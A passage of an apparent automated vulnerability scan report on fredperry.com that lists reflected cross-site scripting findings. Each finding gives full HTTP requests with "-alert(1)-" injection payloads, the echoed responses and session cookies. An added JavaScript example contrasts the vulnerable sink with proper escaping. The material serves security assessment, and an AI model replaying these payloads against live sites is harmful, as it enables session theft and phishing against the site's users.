7.12. https://www.fredperry.com/skin/frontend/default/default/css/print.css

7.13. https://www.fredperry.com/skin/frontend/default/default/css/styles.css

8. Private IP addresses disclosed

8.1. http://www.fredperry.com/js/index.php

8.2. http://www.fredperry.com/skin/frontend/default/default/css/catalogue.css

8.3. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

8.4. http://www.fredperry.com/skin/frontend/default/default/css/fp_style.css

8.5. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

8.6. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

8.7. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

8.8. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

8.9. http://www.fredperry.com/skin/frontend/default/default/css/gs_reset.css

8.10. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

8.11. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

8.12. http://www.fredperry.com/skin/frontend/default/default/css/payment.css

8.13. http://www.fredperry.com/skin/frontend/default/default/css/print.css

8.14. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

8.15. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

9. Social security numbers disclosed

9.1. http://www.fredperry.com/aboutus/careers/

9.2. http://www.fredperry.com/aboutus/security/

9.3. http://www.fredperry.com/aboutus/terms/

9.4. http://www.fredperry.com/accessories/

9.5. http://www.fredperry.com/accessories/men/

9.6. http://www.fredperry.com/accessories/women/

9.7. http://www.fredperry.com/arcade/

9.8. http://www.fredperry.com/bags/

9.9. http://www.fredperry.com/bags/men/

9.10. http://www.fredperry.com/bags/women/

9.11. http://www.fredperry.com/checkout/cart/

9.12. http://www.fredperry.com/contacts/

9.13. http://www.fredperry.com/customercare/

9.14. http://www.fredperry.com/customercare/delivery/

9.15. http://www.fredperry.com/customercare/deliverylate/

9.16. http://www.fredperry.com/customercare/faq/

9.17. http://www.fredperry.com/customercare/information/

9.18. http://www.fredperry.com/customercare/ordertracking/

9.19. http://www.fredperry.com/customercare/returns/

9.20. http://www.fredperry.com/footwear/

9.21. http://www.fredperry.com/footwear/men/

9.22. http://www.fredperry.com/footwear/women/

9.23. http://www.fredperry.com/heritage/

9.24. http://www.fredperry.com/home/

9.25. http://www.fredperry.com/js/index.php

9.26. http://www.fredperry.com/kids/kidswear/

9.27. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/

9.28. http://www.fredperry.com/limited-edition/

9.29. http://www.fredperry.com/limited-edition/men/

9.30. http://www.fredperry.com/limited-edition/men/accessories/

9.31. http://www.fredperry.com/limited-edition/men/bags/

9.32. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/

9.33. http://www.fredperry.com/limited-edition/men/british-collectables/

9.34. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/

9.35. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/

9.36. http://www.fredperry.com/limited-edition/men/footwear/

9.37. http://www.fredperry.com/limited-edition/men/jackets/

9.38. http://www.fredperry.com/limited-edition/men/knitwear/

9.39. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/

9.40. http://www.fredperry.com/limited-edition/men/new-styles/

9.41. http://www.fredperry.com/limited-edition/men/shirts/

9.42. http://www.fredperry.com/limited-edition/men/shorts/

9.43. http://www.fredperry.com/limited-edition/men/trousers/

9.44. http://www.fredperry.com/limited-edition/men/woven-shirts/

9.45. http://www.fredperry.com/limited-edition/women/

9.46. http://www.fredperry.com/limited-edition/women/accessories/

9.47. http://www.fredperry.com/limited-edition/women/bags/

9.48. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/

9.49. http://www.fredperry.com/limited-edition/women/collaboration/

9.50. http://www.fredperry.com/limited-edition/women/dresses/

9.51. http://www.fredperry.com/limited-edition/women/footwear/

9.52. http://www.fredperry.com/limited-edition/women/jackets/

9.53. http://www.fredperry.com/limited-edition/women/jessica-ogden/

9.54. http://www.fredperry.com/limited-edition/women/knitwear/

9.55. http://www.fredperry.com/limited-edition/women/new-styles/

9.56. http://www.fredperry.com/limited-edition/women/shirts/

9.57. http://www.fredperry.com/limited-edition/women/shorts/

9.58. http://www.fredperry.com/limited-edition/women/skirts/

9.59. http://www.fredperry.com/limited-edition/women/trousers/

9.60. http://www.fredperry.com/limited-edition/women/woven-shirts/

9.61. http://www.fredperry.com/men/

9.62. http://www.fredperry.com/men/jackets/

9.63. http://www.fredperry.com/men/knitwear/

9.64. http://www.fredperry.com/men/shirts/

9.65. http://www.fredperry.com/men/t-shirts/

9.66. http://www.fredperry.com/men/tennis/

9.67. http://www.fredperry.com/men/track-jackets/

9.68. http://www.fredperry.com/men/trousers/

9.69. http://www.fredperry.com/men/woven-shirts/

9.70. http://www.fredperry.com/productinfo/clothingsizes/

9.71. http://www.fredperry.com/productinfo/footwearsizes/

9.72. http://www.fredperry.com/productinfo/garmentcare/

9.73. http://www.fredperry.com/sale/

9.74. http://www.fredperry.com/shops/

9.75. http://www.fredperry.com/site-map/

9.76. http://www.fredperry.com/women/

9.77. http://www.fredperry.com/women/amy-winehouse-landing/

9.78. http://www.fredperry.com/women/amy-winehouse/

9.79. http://www.fredperry.com/women/dresses/

9.80. http://www.fredperry.com/women/jackets/

9.81. http://www.fredperry.com/women/knitwear/

9.82. http://www.fredperry.com/women/shirts/

9.83. http://www.fredperry.com/women/skirts/

9.84. http://www.fredperry.com/women/t-shirts/

9.85. http://www.fredperry.com/women/tennis/

9.86. http://www.fredperry.com/women/trousers/

9.87. http://www.fredperry.com/women/woven-shirts/

9.88. https://www.fredperry.com/customer/account/login/

9.89. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

9.90. https://www.fredperry.com/js/index.php

10. Cacheable HTTPS response

11. HTML does not specify charset

12. Content type incorrectly stated

12.1. http://www.fredperry.com/catalogsearch/ajax/suggest/

12.2. http://www.fredperry.com/js/index.php

12.3. http://www.fredperry.com/skin/frontend/default/default/favicon.ico

12.4. https://www.fredperry.com/skin/frontend/default/default/favicon.ico

13. SSL certificate



1. Cross-site scripting (reflected)
There are 291 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

User input should be encoded for the context it is copied into at every point where it appears in application responses. In an HTML context, all HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc). In a JavaScript string context, as in every instance below, HTML entities are not decoded by the browser, so the data must instead be escaped for JavaScript (for example as \xHH or \uHHHH sequences), including the / character so that </script> can never be formed.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a260"-alert(1)-"b04c9bfebf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus1a260"-alert(1)-"b04c9bfebf1/careers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6lgtsf14sq6tgh58hvj7o36lt3; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus1a260"-alert(1)-"b04c9bfebf1/careers/");
//]]>
...[SNIP]...
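The following is an added worked example; it is not part of the Burp report and is not code from fredperry.com or from Magento. It reconstructs the sink visible in the response above (the request URI concatenated into the double-quoted argument of pageTracker._trackPageview inside an inline script), shows why the payload 1a260"-alert(1)-"b04c9bfebf1 executes, and contrasts it with a JavaScript-string encoder of the kind the remediation background calls for. The function names vulnerableTrackerScript, jsStringLiteral, safeTrackerScript and runInlineScript are assumptions made for this example; the stub pageTracker and alert objects stand in for the browser's.

```javascript
// Added example; not code from the Burp report, fredperry.com or Magento.
// Models the sink shown in finding 1.1: the request URI is concatenated
// into a double-quoted JavaScript string inside an inline <script> block.

// Vulnerable pattern, reconstructed from the report's response bodies.
function vulnerableTrackerScript(requestUri) {
  return 'pageTracker._trackPageview("' + requestUri + '");';
}

// Hardened pattern: emit the value as a JavaScript string literal in which
// every character outside a small allowlist is written as \uXXXX.
// Escaping '"' and '\' keeps the literal intact; escaping '/', '<' and '>'
// means "</script>" can never appear in the page; escaping line terminators
// (including U+2028/U+2029) keeps the literal on one line.
function jsStringLiteral(value) {
  const s = String(value);
  let out = '"';
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    if (/^[A-Za-z0-9 ,._\-?=&:]$/.test(ch)) {
      out += ch;
    } else {
      // Per UTF-16 code unit, so surrogate pairs are escaped half by half,
      // which is still a valid JavaScript string literal.
      out += '\\u' + s.charCodeAt(i).toString(16).padStart(4, '0');
    }
  }
  return out + '"';
}

function safeTrackerScript(requestUri) {
  return 'pageTracker._trackPageview(' + jsStringLiteral(requestUri) + ');';
}

// Executes a generated inline script the way a browser would, with stub
// alert() and pageTracker objects that record what they receive.
function runInlineScript(script) {
  const calls = { alerts: [], pageviews: [] };
  const pageTracker = { _trackPageview: (p) => calls.pageviews.push(p) };
  const alert = (x) => calls.alerts.push(x);
  new Function('pageTracker', 'alert', script)(pageTracker, alert);
  return calls;
}

// The path from finding 1.1, exactly as the report shows it reflected.
const REPORTED_PATH = '/aboutus1a260"-alert(1)-"b04c9bfebf1/careers/';

// Vulnerable: the quote ends the literal and alert(1) runs as code;
// _trackPageview receives NaN ("/aboutus1a260" - 1 - "b04c9...").
// Hardened: alert is never called and the tracker receives the full path.
const vulnerableResult = runInlineScript(vulnerableTrackerScript(REPORTED_PATH));
const hardenedResult = runInlineScript(safeTrackerScript(REPORTED_PATH));
```

Note that HTML-encoding the path (turning " into &quot;) would not help here: the reflection sits inside a script element, where the browser does not decode entities, so the quote would survive and the literal would still be terminated. The value has to be escaped for the JavaScript context, and / must be escaped as well because </script> closes the element regardless of any string literal it sits in. The remediation detail above makes the stronger point: the cleanest fix is not to echo the request URI into script at all (the legacy ga.js _trackPageview() records the current location itself when called without an argument).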

1.2. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2112"-alert(1)-"7af98893783 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/careerse2112"-alert(1)-"7af98893783/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6cb751jfeultlo2nf47np4ppg5; expires=Tue, 09-Nov-2010 17:20:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/careerse2112"-alert(1)-"7af98893783/");
//]]>
...[SNIP]...

1.3. http://www.fredperry.com/aboutus/careers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ced5c"-alert(1)-"791ad1593cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/careers/?ced5c"-alert(1)-"791ad1593cd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=iqubl3ro9c6o2rpcraltep9280; expires=Tue, 09-Nov-2010 17:19:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Careers
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/careers/?ced5c"-alert(1)-"791ad1593cd=1");
//]]>
...[SNIP]...

1.4. http://www.fredperry.com/aboutus/security/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c3b6"-alert(1)-"920d2168f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus6c3b6"-alert(1)-"920d2168f26/security/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=grqcphacqsbo1480b6jtpofki7; expires=Tue, 09-Nov-2010 17:19:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus6c3b6"-alert(1)-"920d2168f26/security/");
//]]>
...[SNIP]...

1.5. http://www.fredperry.com/aboutus/security/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4522d"-alert(1)-"c1b9f21713f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/security4522d"-alert(1)-"c1b9f21713f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=02tsp3nrifb4436vg02ro7s4l0; expires=Tue, 09-Nov-2010 17:20:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/security4522d"-alert(1)-"c1b9f21713f/");
//]]>
...[SNIP]...

1.6. http://www.fredperry.com/aboutus/security/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e49"-alert(1)-"987bc5a30f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/security/?37e49"-alert(1)-"987bc5a30f4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3dnjr2him06dao06n4pjatqll0; expires=Tue, 09-Nov-2010 17:19:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Securit
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/security/?37e49"-alert(1)-"987bc5a30f4=1");
//]]>
...[SNIP]...

1.7. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bae7"-alert(1)-"fc574894142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus6bae7"-alert(1)-"fc574894142/terms/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9r493rjv2rujrhmdkb6it0kgu1; expires=Tue, 09-Nov-2010 17:20:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus6bae7"-alert(1)-"fc574894142/terms/");
//]]>
...[SNIP]...

1.8. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c69"-alert(1)-"63f5ec0be34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/termsa7c69"-alert(1)-"63f5ec0be34/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v21cj99monqcosil98b2hq65s5; expires=Tue, 09-Nov-2010 17:20:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/termsa7c69"-alert(1)-"63f5ec0be34/");
//]]>
...[SNIP]...

1.9. http://www.fredperry.com/aboutus/terms/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4969"-alert(1)-"37e10aae9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/terms/?e4969"-alert(1)-"37e10aae9f7=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
